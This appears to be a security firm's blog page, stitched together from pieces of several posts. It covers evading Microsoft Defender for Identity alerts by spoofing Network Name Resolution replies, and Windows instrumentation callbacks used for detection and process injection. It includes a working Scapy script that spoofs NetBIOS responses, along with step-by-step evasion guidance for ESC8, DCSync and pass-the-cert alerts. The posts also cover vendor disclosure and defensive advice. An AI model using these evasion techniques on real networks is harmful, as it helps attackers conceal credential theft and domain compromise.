First of all, doing the evasion this way is fast and straightforward, because it’s not necessary to care about the different values like NetBIOS hostname and NetBIOS domain name since the NetBIOS node request is directly answered by the correct target. This also comes with the advantage that the NetBIOS node response is 100 % accurate compared to when manually spoofing a NetBIOS node response, where values that are not important to the evasion may be ignored or overlooked, potentially generating indicators of compromise (IOCs). The above image shows that one example is the MAC address. While the MAC address is not critical to DfI’s detection logic, it can be ignored when manually crafting a NetBIOS node status response but theoretically leads to IOCs for malicious actions.

The biggest disadvantage for this approach is the fact that it depends on the availability of another target’s (in this case another DC’s) port, here UDP 137, to retrieve it’s NetBIOS information. When it’s not possible to reach the target on UDP port 137, for instance due to firewalling or network issues, no NetBIOS information can be relayed back to the initial requester, resulting in failing the evasion. Therefore, the manual crafting of NetBIOS node status responses is discussed, too.

Spoofing the NetBIOS node status response

While it can be differentiated technically between relaying a request to receive a correct response or just building the correct response oneself, it’s essentially resulting in the same: a spoofed response is sent. In this case, it’s discussed how to build a spoofed NetBIOS node response to DfI with the relevant information. This can also be done by using Scapy:

def send_spoofed_nbns_node_status_response(pkt):
sample_nbns_node_status_response = (rdpcap(r"PC02_nbns_node_status_response.pcap"))[0]
   udp_src_port = pkt[UDP].sport
   transaction_id = pkt[UDP][NBNSHeader].NAME_TRN_ID

spoofed_nbns_node_status_response = sample_nbns_node_status_response[NBNSHeader]
spoofed_nbns_node_status_response.NAME_TRN_ID = transaction_id
  spoofed_netbios_host_name = 'DC02'.ljust(15, " ")
   spoofed_nebtios_domain_name = 'JSC'.ljust(15, " ")

for index, nbns_entry in enumerate(spoofed_nbns_node_status_response.NODE_NAME):
       if nbns_entry.NAME_FLAGS == 0x04: # UNIQUE
spoofed_nbns_node_status_response.NODE_NAME[index].NETBIOS_NAME = spoofed_netbios_host_name
       elif nbns_entry.NAME_FLAGS == 0x84: # GROUP
spoofed_nbns_node_status_response.NODE_NAME[index].NETBIOS_NAME = spoofed_nebtios_domain_name

    send(IP(dst=dfi_agent_ip)/UDP(dport=udp_src_port)/
   spoofed_nbns_node_status_response)

As a basis, a sample of a NetBIOS node status response from PC02 was captured and saved as PCAP file. This file can be loaded and used for further processing. Besides, the UDP source port and the transaction ID of the incoming request are saved.

In the second block, the node status response is adjusted with the correct transaction ID, and the spoofed NetBIOS names are prepared. The NetBIOS names are specified as 16 bytes fixed length, padded with spaces, while the last byte is the suffix for the service type that is already set in the sample. The last block adjusts the NetBIOS node status response to use the spoofed NetBIOS names.

The result can be seen in the comparison displayed below, while the left image equals the original NetBIOS node status from PC02 and the right image shows the spoofed response that was generated with the script. The NetBIOS domain name stays “JSC” since it was already set.

Figure 18: Original node status PC02
Figure 19: Spoofed node status PC02

When inspecting the result of the spoofed response, differences can be noticed between the spoofed and the relayed attempt. When the relaying attempt is used, there is one more registered NetBIOS name. The entry “JSC <1C> GROUP Registered” is missing when spoofing the DC02 node status response, like it was done with the previous script. The missing entry with the service type 1C is indicating that this node is a domain controller inside the domain (JSC). While this seems to be a relevant criterion to DfI, when it comes to telling whether some requests originate from a domain controller, like it’s the case for the alert: “Suspected suspicious Kerberos ticket request”, it is not. The alert has the limited scope to identify a suspicious request for a TGT domain controller machine account that was not requested from the DC itself. It is not relevant whether the node is registered as domain controller inside the domain; the evasion is working by just spoofing the correct NetBIOS hostname and domain name. This may be explainable through the fact that the two other NNR methods cannot indicate whether one endpoint is registered as a domain controller by a raw, single value, like it’s the case for the NetBIOS node status. Additionally, the detection logic is designed to work with just one NNR method active in the environment, which means that every method must be able to detect all threats independently of the other NNR methods, but with the same reliability.

Figure 20: Tampered NetBIOS node status response PC02 (relayed)

Additional considerations when evading NNR

Windows endpoint considerations

To perform an evasion when working with NNR, there are two more things to consider than just spoofing the NetBIOS node status response. DfI mustn’t receive any NNR responses from the actual operating system (OS) by the machine used by the attacker for the attack and the evasion. When performing the evasion technique with the provided scripts, there would be a race condition between the script-generated, spoofed response and the OS-generated legitimate response. To avoid the race condition, it’s possible to block incoming traffic to the destination ports used for NNR on the attacker machine. The Windows firewall allows to create rules for incoming traffic, but it must be noted that local administrator privileges are required to modify the Windows firewall. Scapy works with using Npcap, allowing to sniff and inject traffic onto the network interface, independently from the Windows OS and therefore the firewall, too. Using that approach, it’s possible to send spoofed NNR responses to the DfI agent while supressing the Windows OS from answering the NNR requests.

The other thing to think of are the two other NNR methods. When inspecting the NNR documentation, it can be seen that it’s recommended when configuring DfI to open up at least one of the related ports on all devices in the environment to allow for at least one primary method to work. This means DfI can perform detection when only one of the NNR methods is answered, which allows to just respond to the NetBIOS method, while ignoring the two others. This can also be done by blocking the required ports on the attacker machine.  

Cached NNR responses by Defender for Identity

Another thing to consider when attempting to evade NNR-based detection is the caching of NNR responses. DfI agents in sensor version 2.2 frequently ask domain-joined devices for their hostnames with the described NNR requests and cache this information, independently of whether suspicious traffic was received from the devices. If the DfI agent is holding newly cached NNR information about one machine and a suspected attack from this machine happens, the cached information can be used, instead of asking the machine directly. This comes with a problem when trying to evade an alert that uses NNR. If the DfI agent collected the hostname about the machine right before the attack is performed, the attacker machine may not be asked for its hostname, making the spoofing of the responses impossible, and the evasion would fail. Therefore, the script for spoofing the NNR responses must be running on the machine, and it must be waited until the DfI agent automatically asks for NNR information. Spoofed responses will be sent, effectively poisoning the DfI cache with spoofed information. Now the attack with the respective NNR detection logic can be performed, and two scenarios can happen: The DfI agent uses the spoofed, cached information or the attacker machine is asked for its NNR information and spoofed responses can be sent. Both will result in successfully evading the alert.

Indicators of Defender for Identity 2.2 usage in the environment

It can be attempted to fingerprint DfI in version 2.2 when having control over a domain-joined machine. As described above, DfI frequently queries domain-joined devices in the domain for their hostnames using NNR requests. Having the access required to sniff the network interface on a compromised host, it can be looked for the three primary methods of NRR: NetBIOS node status request, RDP and NTLM over RPC originating from a Windows server that could run DfI. Specific characteristics about the RDP and NTLM over RPC messages, which help to identify DfI 2.2, are described in the section “Reviewing the remaining NNR methods”. The certainty with which it can be said that a Windows server is running DfI v.2.2 depends on the number of related ports that are open on the attacker machine and on the network. The three NNR requests are sent together as a bundle. If all three ports are open, essentially all three messages arrive as a “bundle”, presenting a high likelihood that it’s from DfI. If we assume that two ports are closed and just UDP port 137 is open, it’s not possible to say with high certainty that this request is from DfI, when just receiving a single NetBIOS node status request.

ADCS-ESC8

DfI also comes with an alert for the ACDS-ESC8 attack. To detect this attack, it’s required that DfI is installed on the related CA.

Attack overview

This attack technique is aimed against the Active Directory Certificate Services (AD CS), allowing an attacker who is capable of performing a NLTM-relaying attack of a machine account to obtain a certificate valid to be used for Kerberos authentication in the name of the impersonated machine account. Additionally, some requirements must be met to make the CA’s web enrolment endpoint vulnerable to this attack. For further information check out the white paper from Specter Ops: Certified Pre-Owned: Abusing Active Directory Certificate Services.

This time, the actor is on kali.jsc.lab (172.16.94.13) performing the attack. The attack scenario looks like this:

Figure 21: ADCS-ESC8 simplified overview

Note that the ESC8 attack consists of using an authentication-coercion attack and NTLM relay, which is only represented in a simplified way in this image. What happens effectively is the following:

  • The Kali machine forces the DC01 machine account to authenticate at the Kali machine using NTLM (1)
  • In step (2) and (3), Kali performs the authentication via NTLM as DC01 against the CA
  • In step (4), the attacker obtains a certificate in the name of DC01, which allows for later Kerberos authentication

Evading ESC8 using NNR

The detection logic for the alert also depends on the NNR feature. This time, the DfI agent installed on the CA02 is responsible for performing the detection. The question to be answered is whether the requestor of the certificate for DC01 is indeed DC01. The issuing of the certificate for DC01$ happened between the Kali machine and the CA. Therefore, DfI will investigate if the IP address 172.16.94.13 belongs to DC01, using NNR.

Assuming no evasion technique is used and the Kali machine responds to the NNR requests, the flow would look as follows:

Figure 22: NNR flow after ESC8

Using the previously described evasion technique for NNR, the ESC8 alert “Suspicious Domain Controller certificate request (ESC8)” can be evaded by pretending to be the machine account in whose context the certificate was requested. In this example, that machine account is DC01. While using the ESC8 attack, the detection capabilities for different coercion attacks and NTLM relay must be considered, too.

Comparing NNR usage for ESC8 to NTLM-relayed shadow credentials

An interesting inconsistent usage of the NNR feature by DfI can be observed when comparing ESC8 with relayed shadow credentials. In the shadow credentials section, in part “Computer to computer”, it was said that shadow credentials can be set for machine accounts without triggering an alert when this is done over a NTLM-relayed connection. The question arising in the shadow-credentials scenario is the same as in the ESC8: “Is the request performed by the actual machine associated with the machine account, or by a different machine that successfully authenticated as that machine account via NTLM”. But for relayed shadow credentials, no NNR requests are sent to the machine from which the traffic for setting the shadow credential originated.

DCSync

Attack overview

DCSync attack refer to an attacker who has control over an entity that has the high privileges in the domain necessary to replicate parts of the domain. When having access to such an entity, which could be a domain controller machine account or a high privileged service account with the replication rights or a domain administrator, an attacker can obtain sensitive data. For example, he could receive the AES key of the krbtgt user, which is used to encrypt and sign TGTs inside the domain, allowing him to create golden tickets and persist himself.

The alert for DCSync is also vulnerable to spoofing NNR responses since its detection logic builds on NNR. But for the evasion possibilities, it must be distinct from the identity that performs the DCSync. While domain controllers always have the replications right, user and service accounts can also be permitted.

Evading DCSync alert using domain controller machine account

When performing DCSync attacks using the identity of a domain controller machine account, the detection is the same as for the alert “Suspected suspicious Kerberos ticket request” and the ESC8 alert, and the evasion works in the same way, too. If the attacker has obtained a TGT for DC02, the DCSync attack can be performed against DC01, answering the incoming NNR requests, pretending to be DC02 and vice versa.

Considerations for evading DCSync alert using service and user accounts

While detection and evasion of DCSync attack using domain controller machine account is reliable, it cannot be definitely tested for service and user accounts as the detection by DfI is unreliable for those types of accounts.

But there is a theory of one detection criterion that is used for these accounts. When successfully triggering DfI for a DCSync alert using a self-created, non-default service or user account, the alert appears in the portal with the following information: “PC02 is not a recognized domain controller” (see figure 23). The attacks in the tests were performed with the identities of a self-created service account and a user account holding the replication rights and were done from PC02 against DC01. Adding the information that NNR requests are also made to machines from which DCSync attacks originate when using service or user accounts, it can be suspected that originating from any domain controller may be considered legitimate when performing a DCSync attack. Unfortunately, the detection of DCSync attacks with these accounts is unreliable, making it hard to tell if an evasion is successfully performed.

Figure 23: DCSync alert with service account

Reviewing the remaining NNR methods

The focus in this blogpost is on the NNR method using NetBIOS. However, if UDP port 137 is not configured to be open on the network, NetBIOS cannot be used to evade the respective alerts, since the NetBIOS node request will never be received by the attacker and therefore, cannot be answered with a spoofed response. Consequently, the other two methods must also be inspected.

Remote desktop protocol (RDP)

Another primary method is the usage of RDP. According to documentation, “RDP (TCP port 3389) – only the first packet of Client hello” is used to perform the name resolution. No RDP connection is established; the DfI agent initiates a TLS handshake based on port 3389, acting as a client to the suspected attacker machine and sending the “Client Hello” message. If the machine is configured to listen on TCP port 3389, it will respond with the “Server Hello” message. Part of that message is the machine’s RDP certificate with extended key usage for server authentication, allowing to authenticate against the client. The RDP certificate used for this purpose can be found at the local machine’s certificate store at “cert:\LocalMachine\Remote Desktop”. By default, this is an auto-generated self-signed certificate, using the FQDN of the machine as subject and issuer. To get information related to the domain- and hostname from one machine in order to compare it with the information provided in the discussed attacks like pass-the-cert for domain controller, ESC8 or DCSync, the same technique is used as it was done with NetBIOS. This time, DNS-related information is obtained, using that NNR technique. In this case, the subject of the provided certificate is used to resolve the IP address from a potential attacker’s machine to domain and hostnames.

DfI accepts the certificate to gain the FQDN of the machine even if it is self-signed, which provides the possibility to answer to the NNR request with a spoofed, self-signed certificate. This request could also be relayed to the desired target by the attacker but requires having the RDP port open.  

In the following image the flow can be seen using a spoofed certificate indicating that PC02’s (172.16.94.11) FQDN is DC02.jsc.lab:

Figure 24: Connection to port 3389 on PC02 by DfI
Figure 25: Spoofed certificate in RDP NNR method

NTLM over RPC

The last primary method uses the endpoint mapper on TCP port 135. When a client needs to call a Windows service, for example WMI, it first contacts the endpoint mapper on port 135 to discover on which dynamic port the requested service is actually listening. The mapper then returns that high port, and the client connects to it to complete the RPC exchange. In the case of DfI, a bind request is sent to the suspected malicious machine asking to bind on the RCP interface to the name service provider (NSPI) while using the NLTM security provider to authenticate. The response sent from the suspected machine contains the information relevant to DfI, while information related to the RCP interface and the binds is irrelevant since DfI cares only about about the information required to resolve host- and domain names. This information is included in the part where the NTLM negotiation happens. Besides the NTLM server challenge, the machine gives information about its NetBIOS and DSN names to DfI. At this particular time, no authentication happened between DfI and the machine and no tamper protection is included in these messages. This also allows the manipulation and spoofing of these messages to evade NNR detection. The two messages exchanged can be seen below:

Figure 26: NTLM over RCP NNR method

Secondary method: DNS lookup

When the primary methods (NetBIOS, RDP, NTLM over RPC) fail, a DNS lookup is used. This is the case if there is no response from any of the primary methods or if there’s a conflict in the responses received from two or more primary methods. Inspecting the DfI agent using Procmon, the described behavior is as follows:

Figure 27: Secondary method: DNS lookup

In the upper highlighted area, the three primary methods can be seen, while no connection to “PC02” could be established using these protocols and no NNR response will be received. The second area shows that two DNS requests are made by the DfI agent. The exact request made can be seen in Wireshark, when monitoring the loopback interface on DC01:

Figure 28: DNS lookup by DfI agent

The first request is a reverse DNS lookup, using the IP address from which the suspected attack originated to receive the hostname of the machine. The second request is a forward DNS lookup using the received hostname, serving as a secondary verification step to check whether the initial IP address is returned again.

Reviewing the impact of NNR vulnerability

It was discussed how the flaw in NNR could be exploited, leading to an evasion of alerts that rely on NNR. The impact of that vulnerability can also be rated by the number of alerts that are affected by it. Microsoft writes: “NNR data is crucial for detecting the following threats:”

  • Suspected identity theft (pass the ticket)
  • Suspected DCSync attack (replication of directory services)
  • Network-mapping reconnaissance (DNS)

Which means that at least three alerts depend on NNR to be triggered. While the DCSync alert appears here, there are two additional alerts not shown in this list that rely on NNR, as previously discussed. These two are the ADCS-ESC8 alert “Suspicious Domain Controller certificate request (ESC8)” and the pass-the-cert alert for domain controller machine account “Suspected suspicious Kerberos ticket request”. This makes at least five alerts in total, and there may be more alerts using NNR as detection technique.

It should be noted that NNR working in that way only applies to DfI version 2.X. DfI in version 3.0 uses NNR but does not include the attacker machine in its detection logic. For performing the name resolution, the defender device inventory is used, which is outside of the attacker’s control. The device inventory is a centralized overview of all discovered devices in the organization. The device information is collected through multiple of Microsoft’s security products like DfI and Defender for Endpoint.

Defender for Identity deployment overview

Furthermore, it can be inspected which Windows server can run DfI sensors in version 3.0 and which remains at version 2.2 to get a better idea of the risk posed by NNR.

Figure 29: DfI sensor deployment overview (https://learn.microsoft.com/en-us/defender-for-identity/deploy/deploy-defender-identity)

First, only domain controllers can use the sensor in version 3.0. The CA, Federation server and Entra connect server remain in sensor version 2.2. This makes alerts that are generated from DfI agents running on these servers and depending on NNR vulnerable to being evaded.

For domain controllers the usage of version 3.0 is only possible when running as Windows Server 2019 or higher and when Microsoft Defender for Endpoint is enabled on that Windows Server.

Disclosure to Microsoft MSRC

A security advisory about the flaw in the core feature NNR affecting DfI version 2.2 was disclosed to Microsoft via the MSRC portal on February 22, 2026. The vulnerability was not recognized by Microsoft and was reasoned to be below the bar for immediate servicing. As far as the answer from MSRC can be interpreted, no fix will be issued.

Conclusion

While this blogpost focused on alerts that could be evaded, the summary focuses on the results from these investigations. The biggest problem DfI faces are issues related to the involvement of the assumed attacker into the detection logic using indicators to make decisions, controlled by him. This problem can be observed when looking at the pass-the-cert alert, where DfI attempts to detect the attack through attacker-controlled indicators. The problem also becomes evident through the reliance on information provided by self-signed certificates under the attacker control, like the age of a certificate, which is used to determine if further detection logic needs to be applied. Also, the NNR method using RDP relies on information from self-signed certificates and builds decisions on this.

The general problem with the NNR feature in DfI version 2.2 is that it involves the suspected attacker machine while using techniques that do not provide authentication or tamper protection, thereby giving malicious actors the possibility to evade NNR-based detection logic.

Using a trusted database, such as the Defender device inventory, to resolve raw IP addresses to hostnames is a good approach, since it cannot be interfered with by a malicious actor, but it should be available in all DfI versions, not only version 3.0.

Despite various technical issues and the fact that Microsoft does not consider these as vulnerabilities and has no plans to make any changes, security professionals can still take steps to improve security and detectability. This will be described in the second blogpost: Microsoft Defender for Identity evasions in 2026 – Part II.

References

  1. https://www.synacktiv.com/publications/a-dive-into-microsoft-defender-for-identity
  2. https://www.synacktiv.com/publications/understanding-and-evading-microsoft-defender-for-identity-pkinit-detection
  3. https://learn.microsoft.com/en-us/defender-for-identity/nnr-policy
  4. https://learn.microsoft.com/en-us/defender-xdr/pilot-deploy-overview
  5. https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
  6. https://learn.microsoft.com/en-us/defender-for-identity/deploy/deploy-defender-identity
  7. https://blog.redteam-pentesting.de/2025/windows-coercion/
  8. https://en.hackndo.com/ntlm-relay/#preliminary
Red Teaming

Microsoft Defender for Identity evasions in 2026 – Part I

June 16, 2026 – Microsoft Defender for Identity (DfI) is one of Microsoft’s key solutions for detecting identity-based attacks in Active Directory environments – but how well does it hold up against a skilled attacker? This two-part blog post dives into DfI’s detection capabilities for high-impact attacks such as shadow credentials, pass-the-cert, ESC8, and DCSync. Additionally, it uncovers a spoofing and relaying vulnerability in DfI’s Network Name Resolution component that can be used to evade multiple alerts, and offers blue team perspectives on closing these gaps.


Author: Jakob Scholz

Mehr Infos »
Red Teaming

Windows Instrumen­tation Call­backs – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.

Windows Instrumen­tation Call­backs – Part 4

Search

Windows Instrumen­tation Call­backs – Part 4

February 10, 2026

Windows Instrumentation Callbacks – Detection and Counter Meassures, Part 4

Introduction

This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

If you don’t yet know what ICs are, we strongly recommend you read the first part of this series. If you are curious about what can be done with them, we recommend also reading the second and third part.

In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Disclaimer

  • This series is aimed towards readers familiar with x86_64 assembly, computer concepts such as the stack and Windows internals. Not every term will be explained in this series.
  • This series is aimed at x64 programs on the Windows versions 10 and 11. Neither older Windows versions nor WoW64 processes will be discussed.

Detection

In the first blog post we reversed NtSetInformationProcess to find out that the PROCESSINFOCLASS enum value 0x28 is used to set an IC. In the kernel the member InstrumentationCallback of the corresponding KPROCESS structure then gets set to the passed callback address. This of course means that a kernel driver could simply check the KPROCESS structure of the process to check if an IC is set. Before we move on to user-mode ways of detecting ICs, let’s cover something we haven’t in any of the previous posts: unregistering ICs.

Unregistering ICs

We thought “How hard can it be? We can simply call NtSetInformationProcess with a null pointer to unset it.” Correct… sometimes… if the process uses control flow guard (CFG), your IC would still be set as a null pointer is no valid call target. In the first blog post we already mentioned that ntoskrnl!NtSetInformationProcess+0x1d09 is where the callback address gets set in the KPROCESS structure, so let’s go there in the decompiler. In this case we renamed the relevant stack variable that contains the callback address to “ic_addr”. As can be seen, there is a call to MmValidateUserCallTarget with that address before it gets set in KPROCESS:

Consultant

Category
Date
Navigation

If we decompile MmValidateUserCallTarget, it quickly becomes clear that this has something to do with CFG as can be seen by the call to MiIsProcessCfgEnabled because otherwise simply 1 is returned.

A null pointer is very obviously not a valid call target; however, let’s quickly prove that this function isn’t successful by using a kernel debugger and placing a breakpoint on NtSetInformationProcess+1ccc, which is where MmValidateUserCallTarget is executed. Additionally, we placed a breakpoint on NtSetInformationProcess+1d09 to show where the IC gets set in the KPROCESS struct. As can be seen, when the address for the IC is passed to MmValidateUserCallTarget, the function returns 1 and KPROCESS is updated. However, when a null pointer is passed, 0 is returned.

You can’t see if KPROCESS is updated after the last g instruction; you will just have to believe us that it didn’t. But as can be seen in the previously shown decomplication of NtSetInformationProcess, the relevant code branch to update KPROCESS isn’t even executed, as instead ExRreleaseRundownProtection is called.

This means, an IC can only be entirely unregistered (be set back to 0) if a process doesn’t have CFG enabled. Otherwise, it can only be updated to a new valid call address and never be set back to the original value the InstrumentationCallback member value had at the processes start: 0. While any valid call target’s address can be used, the address should be carefully selected, as most will of course crash the program as random code would be executed. The updated callback of course still needs to do what is expected of an IC, which is to continue execution by jumping to r10. This also means that if a DLL that gets loaded into a CFG-enabled process sets an IC with the callback being in its own memory region, the process will crash once that DLL is unloaded and the DLL’s memory including the callback gets deallocated. In this case the callback would also need to get updated before the DLL is unloaded if the process shouldn’t crash.

For CFG-enabled processes it is thus not possible to hide from kernel mode drivers that an IC was set, as they can simply check if the process’s KPROCESS.InstrumentationCallback != 0. For non-CFG processes the InstrumentationCallback member can be restored to its original value.

In addition to that, enabling CFG makes ICs easier to detect on a big scale, as poorly written IC implementations will crash the process, which will be written to event logs. This is of course not great, but what’s better? Processes crashing, which indicates something weird is going on, or working processes with an attacker’s code inside?

User mode

That it is possible detect if an IC is set from kernel mode was obvious, as we discussed in the first blog part already that it’s merely a member of the process’s KPROCESS structure. Let’s discuss the way more interesting scenario: detecting from user mode if an IC is set on one’s own process. If you step through the process with a debugger, you will obviously be able to tell that an IC is registered if a syscall that is stepped over causes the code flow to magically jump to somewhere else. Let’s discuss different ways.

If an IC is set with NtSetInformationProcess, the logical way of checking if an IC is set would be to call NtQueryInformationProcess instead. However, when we disassemble/decompile NtQueryInformationProcess and search for the switch case on the second parameter, which is the PROCESSINFOCLASS, we can see that it is not implemented. This is shown by the following shortened decompilation:

NtQueryInformationProcess(arg1, proc_info_class, …)
[…]
+0x002b        int64_t proc_info_class_copy = (int64_t)proc_info_class;
[…]
+0x02f9            switch (proc_info_class_copy) {
[…]
+0x3bf6                case 5:
+0x3bf6                case 6:
+0x3bf6                case 8:
+0x3bf6                case 9:
+0x3bf6                case 0xb:
+0x3bf6                case 0xd:
+0x3bf6                case 0x10:
+0x3bf6                case 0x11:
+0x3bf6                case 0x19:
+0x3bf6                case 0x23:
+0x3bf6                case 0x28:
+0x3bf6                case 0x29:
+0x3bf6                case 0x30:
+0x3bf6                case 0x35:
+0x3bf6                case 0x38:
+0x3bf6                case 0x39:
+0x3bf6                case 0x3e:
+0x3bf6                case 0x3f:
+0x3bf6                case 0x44:
+0x3bf6                case 0x4e:
+0x3bf6                case 0x50:
+0x3bf6                case 0x53:
+0x3bf6                case 0x56:
+0x3bf6                case 0x5a:
+0x3bf6                case 0x5b:
+0x3bf6                case 0x5d:
+0x3bf6                case 0x5f:
+0x3bf6                {
+0x3bf6                    result = -0x3ffffffd;
+0x3bf6                    break;
+0x3bf6                }
[…]

As you might remember, we used 0x28 for setting the IC.

This means, we can’t use NtQueryInformationProcess to find out if an IC is set. We don’t know of any user mode function that allows querying for the IC; that does of course not mean that it doesn’t exist. By dumping kernel memory, we could of course again read out the KPROCESS structures to check for ICs, but this would obviously require a driver or some way to execute code in the kernel memory, riiiight Microsoft? There is a way (/are ways?) of dumping kernel memory including the KPROCESS structures entirely from user mode without needing to load any drivers yourself. We won’t tell you how this is done, as we are already spoon-feeding you enough 😉 Additionally, that would be a moral gray area; we want to keep EDRs/ACs a step ahead of attackers.

rcx and r10

In the first blog post we briefly mentioned that we recommend attaching a debugger to a program with and without an IC set to check the values of registers after syscalls but didn’t dive deeper into it. I attached WinDbg to a random process and set a breakpoint on a random syscall (ntdll!NtWriteVirtualMemory+0x12). As can be seen in the following screenshot, rcx was changed to the address of the instruction after the syscall, that is the ret instruction. Also, r10 was zeroed.

Now compare this to the following screenshot, which was taken after an IC was set:

As expected, r10 contains the address of the actual return address. The picture also shows that rcx contains the address of the start of the IC instead of the actual return address.

This means, we can detect poorly written ICs by checking rcx and r10 at the ret instruction after the syscall, that is the instruction it would normally execute if no IC was set. These registers can of course be arbitrarily changed by the IC, but that needs to be kept in mind by the author. If rcx isn’t properly set, it does not only leak that an IC is set but also where it is located in memory, which could be used to automatically dump it or for something even more interesting ‑ which we will get to.

Preventing ICs from getting set

If it is hard to detect whether an IC is set or not, we could try preventing others from setting them in the first place. This is not very easy to do. Let’s assume two different starting points of an attacker: the attacker is inside the process on which he wants to set an IC or the attacker is in another process. If the attacker is already in the kernel, you got entirely different problems so we will not discuss that.

One’s own process context

In the second part of this blog post, we already discussed one way of preventing the IC from getting overwritten, which was done by hooking NtSetInformationProcess. For a simple attacker this suffices; however, the hook can be avoided through direct and indirect syscalls. Even if the syscall instruction in NtSetInformationProcess is hooked, an attacker could use the syscall instruction of another Windows API to not run into the hook. This would mess up the callstack, but to detect that, a kernel driver would be required as once the syscall was executed and returned to user mode, the new IC is already set. Another idea is to place a page guard on the memory page of NtSetInformationProcess after registering an appropriate exception handler to detect SSN reads of the SSN of NtSetInformationProcess or nearby syscalls; this would however take a toll on performance.

Another detection mechanism is using a heartbeat. The originally set IC could use a counter that increments on every IC execution, while some regular code that is not in the IC checks every few seconds if the counter was incremented. If the counter wasn’t incremented in a while, the IC was overwritten, as syscalls are, depending on the program, constantly made. This way the program could then try reregistering its own IC, which is not guaranteed to succeed, but the program can again detect through the counter if reregistering the IC was successful.

If the attacker’s IC is adjusted to the program, he could of course also increment that counter himself, or even more interesting: if the previous ICs address was leaked through the beforementioned ways, the attacker’s IC could call the previous IC through its own IC while filtering what is passed to it. This means, it is not only interesting for attackers to hide that an IC is set but also for defenders as there’s no proper way of being entirely sure that your IC is the registered one. At this point we are talking about a very sophisticated attacker, as the IC would need to be highly adapted. If the victim process does not repeatedly dump the IC address itself (very unlikely), it has no way of knowing if its own IC was overwritten, as any detection logic in that IC can be automatically executed by calling the IC from the new, actually set IC.

Other process context

As initially mentioned, setting an IC on another process requires the SeDebugPrivilege. This is a very extensive privilege. If the user does not have this privilege, there is no way for him to set an IC on another process. This means, properly hardening your environment and stripping users of unneeded privileges is also the best defense against ICs being set on other processes.

Let’s assume the user has the SeDebugPrivilege. In that case the victim process can’t do much against an IC being set other than repeatedly scanning for open handles and closing those with the PROCESS_SET_INFORMATION access mask. This contains a race condition, as with the correct timing an IC can still be set. Of course, once the IC is set the same detection mechanisms mentioned in “One’s own process context” apply again.

Closing words

This marks the end of this blog series. Congratulations if you read through all of it! If you got questions or built upon this research (as there’s still a lot to discover with ICs), feel free to reach out.

Further blog articles

AD Security

Microsoft Defender for Identity evasions in 2026 – Part II

June 17, 2026 – The first blogpost highlighted the detection capabilities and the resulting evasion options for Microsoft Defender for Identity (DfI). To complement the first part, the second part will present some alternative detection possibilities for the defensive side to improve visibility and security, as well as the upgrade from DfI version 2.2 to DfI version 3.0.

Author: Jakob Scholz

Mehr Infos »
Red Teaming

Windows Instrumen­tation Call­backs – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Mehr Infos »
Reverse Engineering

Windows Instrumen­tation Call­backs – Part 3

January 28, 2026 – In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Author: Lino Facco

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.

Windows Instrumen­tation Call­backs – Part 3

Search

Windows Instrumen­tation Call­backs – Part 3

January 28, 2026

Windows Instrumentation Callbacks – Injections, Part 3

Introduction

This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

If you have not yet read the first and second part of this series, we strongly recommend you read it to find out what ICs are and how to set them.

In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Disclaimer

  • This series is aimed towards readers familiar with x86_64 assembly, computer concepts such as the stack and Windows internals. Not every term will be explained in this series.
  • This series is aimed at x64 programs on the Windows versions 10 and 11. Neither older Windows versions nor WoW64 processes will be discussed.
  • This post contains much assembly code; don’t be a script kiddie – take your time to understand what you’re doing instead of just copy-pasting!

Recap

In the first blog post we learned how to install an IC on a process and how to use that callback to interact with specific syscalls.

We learned this by the example of intercepting the syscall made by OpenProcess inside the subfunction NtOpenProcess. After intercepting NtOpenProcess, we closed the handle that was opened and spoofed a return value of STATUS_ACCESS_DENIED.

In the second part of the series, we learned how to hook arbitrary code in the current process context with ICs using exceptions.

However, we haven’t yet set an IC on another process even though we learned in the first part of this series that this should be possible with the SeDebugPrivilege. Due to the IC getting executed as a callback to every returning syscall, setting an IC on another process would mean getting code execution in that processes’ context, which can be used for a process injection.

Process injection

If you understood the blog series so far, it is very likely that you know what a process injection is. Let’s break down what is normally needed for a regular process injection, that is injecting code into another process. Depending on whether you’re familiar with the concept of virtual address spaces and virtual memory in general, trying to access memory in another process would result in expected or unexpected results. The code normally needs to get written to the other process. Obviously, to write the code to the other process’ memory space, you need to have a handle to the process with sufficient permissions and need to know where to write the code. For this you normally have two options: allocating memory in the other process context or overwriting an existing executable memory region. After the code was written to an executable memory region, it needs to get executed. The most basic process injections use the CreateRemoteThread function for this. Other execution mechanisms are, for example, API hooking, early bird APC injections or thread hijacking. There are many ways, but they all effectively just execute the written code. There are multiple websites online that collect different execution mechanisms; however, most don’t include ICs. While researching ICs, I found a blog post by Black Lantern Security about detecting process injections. They briefly mentioned using ICs for call stack analysis to detect injections, which is a great use case for them, but it can also be used for exactly what it should detect. That would also have the bonus effect of overwriting their IC, basically removing those security checks. In the next part of this blog series, we will cover ICs from a more defensive standpoint and how to protect against your own IC being overwritten.

